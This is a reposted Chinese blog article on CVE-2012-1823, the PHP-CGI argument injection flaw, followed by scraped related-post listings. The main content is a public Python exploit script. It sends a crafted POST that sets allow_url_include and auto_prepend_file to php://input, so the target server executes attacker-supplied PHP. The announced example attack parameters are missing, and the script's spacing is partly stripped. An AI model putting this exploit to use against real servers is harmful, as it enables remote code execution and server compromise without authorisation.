PHP-CGI漏洞成因原理剖析和利用

最新推荐文章于 2023-07-10 19:47:14 发布
最新推荐文章于 2023-07-10 19:47:14 发布
阅读量759 收藏
点赞数
文章标签: php 后端 python
原文链接:http://www.cnblogs.com/rockee/archive/2012/05/23/2514227.html
版权
PHP-CGI漏洞成因原理剖析和利用
http://www.2cto.com/Article/201205/130488.html

 PHPCGI漏洞最早由国外安全研究者于近日公开,其实际存在的时间则长达约8年之久。据360网站安全工程师介绍,该漏洞是用户将HTTP请求参数提交至Apache服务器,通过mod_cgi模块交给后端的php-cgi处理,但在执行过程中部分字符没有得到处理,比如空格、等号(=)、减号(-)等。利用这些字符,攻击者可以向后端的php-cgi解析程序提交恶意数据,php-cgi会将这段“数据”当做php参数直接执行,目前截获到的攻击主要利用以下PHP参数:

包含本地文件读取内容:

读取PHP源码:

直接执行任意命令:

  通过远程包含直接在服务器上执行webshell:

国外黑客公开的测试代码:
 
######################################################################################
 
# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit
# Date: May 4, 2012
# Author: rayh4c[0x40]80sec[0x2e]com
# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com
######################################################################################
 
importsocket
importsys
 
defcgi_exploit():
        pwn_code ="""<?php phpinfo();?>"""
        post_Length =len(pwn_code)
        http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s
 
%s
"""%(HOST , post_Length ,pwn_code)
        printhttp_raw
        try:
            sock =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((HOST, int(PORT)))
            sock.send(http_raw)
            data =sock.recv(10000)
            printrepr(data)
            sock.close()
        exceptsocket.error, msg:
            sys.stderr.write("[ERROR] %s\n"%msg[1])
            sys.exit(1)
               
if__name__ =='__main__':
        try:
            HOST =sys.argv[1]
            PORT =sys.argv[2]
            cgi_exploit()
        exceptIndexError:
            print'[+]Usage: cgi_test.py site.com 80'
            sys.exit(-1)

转载于:https://www.cnblogs.com/rockee/archive/2012/05/23/2514227.html

weixin_30576827
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IIS与PHP中间件存在的解析漏洞
weixin_42478365的博客
10-06 588
1.IIS解析漏洞 IIS6.0在解析文件时存在以下两个漏洞 1.当建立*.asa、.asp格式的文件夹时,其目录下的任意文件都将被IIS当作aps文件来执行。 2.当文件为.asp;1.jpg时,IIS6.0同样会以ASP脚本来执行,如:新建文件test.asp;1.jpg, 3.IIS的经典漏洞WebDav。WebDav是一种基于HTTP1.1协议的通信,它扩展了HTTP协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使得HTTP协议更加强大。   &
(CVE-2012-1823)PHP-CGI远程代码执行漏洞(80端口)
最新发布
m0_62670778的博客
05-12 565
php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了fastcgi
PWN利用动态链接跳转到任意函数执行地址
z2876563的博客
08-11 1153
前置知识-共享库与动态链接 以下部分为CSAPP第七章中的内容。 由于库函数是经常更新的,且像print这种函数会被调用很多次,如果使用静态库会被复制很多次,浪费空间。所以出现了共享库,所有程序在运行或加载时通过动态链接器动态链接共享同一段内存里的代码。在 Linux 系统中通常用 .so 后缀来表示可共享库,微软中用DLL表示。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yc4mpKz5-1628688973025)(https://gblobscdn.gitbook.c
pwn环境搭建_php pwn学习入门一 (基础环境搭建)
weixin_39843151的博客
12-29 473
php pwn学习入门一 (基础环境搭建)本文是学习php二进制漏洞利用的第一篇文章,本文主要简单说一下基础的环境搭建问题以及一个简单的栈溢出的利用过程。php不同的运行模式SAPI(Server Application Programming Interface)是服务器端应用编程端口,它是应用层(比如 Apache,Nginx,CLI等)和 PHP 进行数据交互的入口。利用SAPI,php能够...
PWNHUB 七月内部赛 babyboa、美好的异或 Writeup
Internet_xx的博客
07-31 607
                                          &nbs
PHP-CGI远程代码执行漏洞分析与防范
10-19
本文给大家介绍的是PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
Cgi-bin 30个漏洞+使用方法.txt
07-18
Cgi-bin 30个漏洞+使用方法
PHP-CGI进程CPU 100% 与 file_get_contents 函数的关系分析
10-28
有时候,运行 Nginx、PHP-CGI(php-fpm) Web服务的 Linux 服务器,突然系统负载上升,使用 top 命令查看,很多 php-cgi 进程 CPU 使用率接近100%。
处理(php-cgi.exe - FastCGI 进程超过了配置的请求超时时限)的问题
10-27
本篇文章是对解决(php-cgi.exe - FastCGI 进程超过了配置的请求超时时限)的问题进行了详细的分析介绍,需要的朋友参考下
webcgi-exploits:多语言Web CGI界面漏洞利用
05-13
Web CGI漏洞利用 这是与不同的Web CGI相关的几种漏洞利用。 我在过去几年中写过这些漏洞。 这个怎么运作 Web应用程序基本上就是这些层: 应用领域 网络框架 脚本语言引擎 Web容器(服务器) 网络前端代理(nginx...
php cgi漏洞利用工具 源代码
01-22
cgi mod(cve-2012-1823)最新漏洞,可以批量扫描多网段漏洞,多加利用,可以获取服务器控制权限。
一次成功的cgi漏洞入侵
04-19
网站安全包括许多方面,尽管网管们千方百计的防范于未然,可有时还是难免疏漏。 我的“再谈cgi漏洞攻击”一文中,我利用cgi漏洞攻进几台服务器,这次我将以一次,从发现漏洞利用漏洞, 从而攻进主机的全过程来讲解,与大家交流。
nginx+php-cgi 进程守护工具
07-05
php_cgi_dir => 填写 php-cgi.exe 所在目录 php_cgi_start => 填写 php-cgi 启动参数及端口 php_cgi_num => 填写同时运行 php-cgi 的个数 其他使用默认配置即可 工具简陋,原本供自己使用,现方便有相同需求的人。 ...
处理(php-cgi.exe – FastCGI 进程超过了配置的请求超时时限)的问题
12-19
【详细错误】:HTTP 错误 500.0 – Internal Server ErrorC:\Program Files\PHP\php-cgi.exe – FastCGI 进程超过了配置的请求超时时限【环境】:php + IIS7.5解决办法:方法一:C:\Windows\System32\inetsrv\config...
2023 ciscn 华东北分区赛 pwn cgi
z1r0的博客
07-10 464
模拟了一个http协议的交互。
php漏洞是什么意思,PHP程序漏洞产生的原因分析与防范方法说明
weixin_36322275的博客
03-09 753
滥用include1.漏洞原因:Include是编写PHP网站中最常用的函数,并且支持相对路径。有很多PHP脚本直接把某输入变量作为Include的参数,造成任意引用脚本、绝对路径泄露等漏洞。看以下代码:...$includepage=$_GET["includepage"];include($includepage);...很明显,我们只需要提交不同的Includepage变量就可以获得想要的页...
漏洞挖掘】——29、XSS闯关游戏录(上)
Fly_鹏程万里
03-22 1972
alf.nu/alert1是一个XSS训练平台,集结了一些常见的XSS漏洞利用场景,总共有29道题目。
windows下 解决PHP-CGI 进程崩溃502
05-26
当使用 Nginx + PHP-CGI 时,可能会遇到 502 Bad Gateway 错误,这通常是由于 PHP-CGI 进程崩溃或无法响应请求造成的。以下是一些解决方法: 1. 修改 PHP-CGI 的运行参数 可以尝试在 PHP-CGI 的运行参数中添加以下参数: ```shell php-cgi -b 127.0.0.1:9000 -d max_execution_time=300 -d memory_limit=128M ``` 其中,-d 参数可以设置 PHP 的配置参数,例如上面设置了最大执行时间为 300 秒,内存限制为 128MB。 2. 增加 PHP-CGI 进程数 可以修改 Nginx 配置文件中的 fastcgi_params 参数,增加 PHP-CGI 进程数,例如: ```nginx fastcgi_param PHP_FCGI_CHILDREN 8; ``` 其中,PHP_FCGI_CHILDREN 参数表示 PHP-CGI 进程的数量。 3. 检查 PHP-CGI 进程是否正常运行 可以使用 ps 命令检查 PHP-CGI 进程是否正常运行: ```shell ps aux | grep php-cgi ``` 如果没有显示 PHP-CGI 进程,则表示 PHP-CGI 进程未正常运行,需要重新启动 PHP-CGI。 以上是解决 PHP-CGI 进程崩溃造成 502 Bad Gateway 错误的一些方法,具体解决方法需要根据具体情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值